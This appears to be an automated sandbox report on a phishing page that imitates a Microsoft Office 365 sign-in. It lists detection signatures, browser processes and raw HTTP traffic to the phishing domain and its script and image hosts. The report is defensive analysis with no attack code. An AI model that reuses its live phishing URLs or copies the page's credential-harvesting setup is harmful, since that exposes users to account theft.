Edit tour

Windows Analysis Report
https://offce365.auramisteriosafyr.it.com/CM4kN/

Overview

General Information

Sample URL:https://offce365.auramisteriosafyr.it.com/CM4kN/
Analysis ID:1646519
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
AI detected suspicious URL
Phishing site or detected (based on various text indicators)
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid T&C link found

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 6956 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6272 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,4225585014450391825,7605761118986401797,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2248 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6148 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://offce365.auramisteriosafyr.it.com/CM4kN/" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    0.5.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: https://offce365.auramisteriosafyr.it.com/CM4kN/Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and commonly associated with the domain 'office.com' for Office 365 services., The URL 'offce365.auramisteriosafyr.it.com' contains a misspelling of 'office' as 'offce', which is a common phishing tactic., The domain 'auramisteriosafyr.it.com' does not match the legitimate domain 'office.com' and includes extra words, which is suspicious., The presence of input fields for 'Email, phone, or Skype' is typical for phishing sites attempting to harvest credentials. DOM: 0.5.pages.csv
      Source: https://offce365.auramisteriosafyr.it.com/CM4kN/Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and commonly associated with 'office.com' for Office 365 services., The URL 'offce365.auramisteriosafyr.it.com' contains a misspelling of 'office' as 'offce', which is a common phishing tactic., The domain 'auramisteriosafyr.it.com' does not match the legitimate domain for Microsoft Office 365 services., The presence of an unusual subdomain and domain structure suggests a high likelihood of phishing. DOM: 0.6.pages.csv
      Source: Yara matchFile source: 0.6.pages.csv, type: HTML
      Source: Yara matchFile source: 0.5.pages.csv, type: HTML
      Source: https://offce365.auramisteriosafyr.it.comJoe Sandbox AI: The URL 'https://offce365.auramisteriosafyr.it.com' appears to be a potential typosquatting attempt targeting Microsoft Office 365. The subdomain 'offce365' is a close visual approximation of 'office365', with the letter 'i' omitted, which is a common character substitution tactic in typosquatting. The use of a subdomain 'auramisteriosafyr' and the domain extension '.it.com' do not clearly indicate a legitimate purpose unrelated to the brand, increasing the likelihood of user confusion. The structural similarity and the context suggest an attempt to deceive users into thinking they are accessing a legitimate Microsoft Office 365 service.
      Source: Chrome DOM: 0.3OCR Text: 'logo Microsoft Browser activating protection measures. Verifying... CLOUDFLARE 1.22'/ Ternw Your connection must be checked by Microsoft for security reasons before continuing.
      Source: https://offce365.auramisteriosafyr.it.com/CM4kN/HTTP Parser: Number of links: 0
      Source: https://offce365.auramisteriosafyr.it.com/CM4kN/HTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://offce365.auramisteriosafyr.it.com/CM4kN/HTTP Parser: Title: Sign in to your account does not match URL
      Source: https://offce365.auramisteriosafyr.it.com/CM4kN/HTTP Parser: Invalid link: Privacy statement
      Source: https://offce365.auramisteriosafyr.it.com/CM4kN/HTTP Parser: Invalid link: Privacy statement
      Source: https://offce365.auramisteriosafyr.it.com/CM4kN/HTTP Parser: <input type="password" .../> found
      Source: https://offce365.auramisteriosafyr.it.com/CM4kN/HTTP Parser: No favicon
      Source: https://offce365.auramisteriosafyr.it.com/CM4kN/HTTP Parser: No favicon
      Source: https://offce365.auramisteriosafyr.it.com/CM4kN/HTTP Parser: No favicon
      Source: https://offce365.auramisteriosafyr.it.com/CM4kN/HTTP Parser: No favicon
      Source: https://offce365.auramisteriosafyr.it.com/CM4kN/HTTP Parser: No favicon
      Source: https://offce365.auramisteriosafyr.it.com/CM4kN/HTTP Parser: No <meta name="author".. found
      Source: https://offce365.auramisteriosafyr.it.com/CM4kN/HTTP Parser: No <meta name="author".. found
      Source: https://offce365.auramisteriosafyr.it.com/CM4kN/HTTP Parser: No <meta name="copyright".. found
      Source: https://offce365.auramisteriosafyr.it.com/CM4kN/HTTP Parser: No <meta name="copyright".. found
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
      Source: unknownHTTPS traffic detected: 172.67.210.168:443 -> 192.168.2.16:49705 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.210.168:443 -> 192.168.2.16:49706 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.129.229:443 -> 192.168.2.16:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.65.196:443 -> 192.168.2.16:49722 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49723 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.16:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.16:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.16:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 43.128.193.190:443 -> 192.168.2.16:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.59.5:443 -> 192.168.2.16:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.77.220.51:443 -> 192.168.2.16:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.77.220.51:443 -> 192.168.2.16:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.59.5:443 -> 192.168.2.16:49749 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.16:49750 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49754 version: TLS 1.2
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
      Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
      Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 142.251.32.99
      Source: unknownTCP traffic detected without corresponding DNS query: 142.251.32.99
      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.135.6
      Source: unknownTCP traffic detected without corresponding DNS query: 20.190.135.6
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /CM4kN/ HTTP/1.1Host: offce365.auramisteriosafyr.it.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /gh/pranaynamnaik/files@latest/micro-123787483.png HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://offce365.auramisteriosafyr.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://offce365.auramisteriosafyr.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/708f7a809116/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://offce365.auramisteriosafyr.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/cqb6i/0x4AAAAAAA-tr_eUy_ttfipm/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://offce365.auramisteriosafyr.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92534274b8aa19bf&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/cqb6i/0x4AAAAAAA-tr_eUy_ttfipm/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/cqb6i/0x4AAAAAAA-tr_eUy_ttfipm/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: offce365.auramisteriosafyr.it.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://offce365.auramisteriosafyr.it.com/CM4kN/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=dv6sf7uhb6cju4btkvukae9i2f
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/738700453:1742786781:0bMVTCrKe1fCs7EDN-2RZn2fetqNFoGDkEtvOP3zshU/92534274b8aa19bf/qg5KjHfcPoZeENQ52Rg65SlJBWTDr6LLKFy69zqQcvI-1742788805-1.1.1.1-5oXn2yBUFWvr3Wf2MuqzEzL61opr0KkokL4MvDDW7gh1I6j9uQT2dHyZ2GaF.nJ1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/92534274b8aa19bf/1742788807263/6ee634dbbf7ff9584613e98f7de557fe79dd0a00decd0e99ab6d059eb555f365/J5KFquRooOBDcId HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/cqb6i/0x4AAAAAAA-tr_eUy_ttfipm/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/92534274b8aa19bf/1742788807266/t_YM1B0tRxzYOOq HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/cqb6i/0x4AAAAAAA-tr_eUy_ttfipm/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/92534274b8aa19bf/1742788807266/t_YM1B0tRxzYOOq HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/738700453:1742786781:0bMVTCrKe1fCs7EDN-2RZn2fetqNFoGDkEtvOP3zshU/92534274b8aa19bf/qg5KjHfcPoZeENQ52Rg65SlJBWTDr6LLKFy69zqQcvI-1742788805-1.1.1.1-5oXn2yBUFWvr3Wf2MuqzEzL61opr0KkokL4MvDDW7gh1I6j9uQT2dHyZ2GaF.nJ1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/738700453:1742786781:0bMVTCrKe1fCs7EDN-2RZn2fetqNFoGDkEtvOP3zshU/92534274b8aa19bf/qg5KjHfcPoZeENQ52Rg65SlJBWTDr6LLKFy69zqQcvI-1742788805-1.1.1.1-5oXn2yBUFWvr3Wf2MuqzEzL61opr0KkokL4MvDDW7gh1I6j9uQT2dHyZ2GaF.nJ1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveOrigin: https://offce365.auramisteriosafyr.it.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://offce365.auramisteriosafyr.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://offce365.auramisteriosafyr.it.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://offce365.auramisteriosafyr.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://offce365.auramisteriosafyr.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveOrigin: https://offce365.auramisteriosafyr.it.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://offce365.auramisteriosafyr.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap.min.js HTTP/1.1Host: 6013971728-1317754460.cos.ap-bangkok.myqcloud.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://offce365.auramisteriosafyr.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.png HTTP/1.1Host: res.cloudinary.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://offce365.auramisteriosafyr.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.png HTTP/1.1Host: res.cloudinary.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: ydpj.auramisteriosafyr.it.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
